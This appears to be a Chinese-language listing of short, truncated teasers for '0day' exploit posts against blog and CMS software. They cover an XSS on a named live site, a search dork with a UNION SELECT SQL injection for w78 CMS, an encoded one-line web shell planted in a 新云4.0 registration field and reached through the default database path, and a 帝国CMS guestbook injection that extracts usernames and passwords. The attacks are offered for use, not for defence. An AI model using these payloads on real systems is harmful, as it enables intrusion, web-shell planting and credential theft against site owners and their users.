-
国外一Blog程序0day
近来无聊 去国外网站上转悠,看到一个不错的Blog系统,可以注册用户,并分配一个二级目录。更无聊的就去检测了下,下面是分析结果。站点:http://www.jj.ru/漏洞地址:php?comment=1074">http:...
-
007博客网再暴XSS漏洞
007博客网再次暴出XSS漏洞 本以为上一个XSS漏洞 已经修补谁知道上个漏洞仍然存在 这时才明白管理员不会修补漏洞 只是把修改模板的权限修改了以下 这个并不能解决问题 只要天天登陆博客注册用户就会升级到所允许修改模板的等级 希望官方尽快想...
-
w78 cms免费版的0day
本来是不想爆出来的 在社工客服的时候 我跟客服报告漏洞 想不到他说 免费版不提供任何技术支持而且发现 使用免费版的 不是少数。。 可见其不负责任关键字:inurl:ShopMore.asp% and 1=2 union select 1,a...
-
新云4.0最新0day
访问ask目录,注册用户,在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a...
-
帝国CMS 留言本多字节漏洞
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1出来的是帝国CMS的留言本,在姓名处写:縗联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0&...
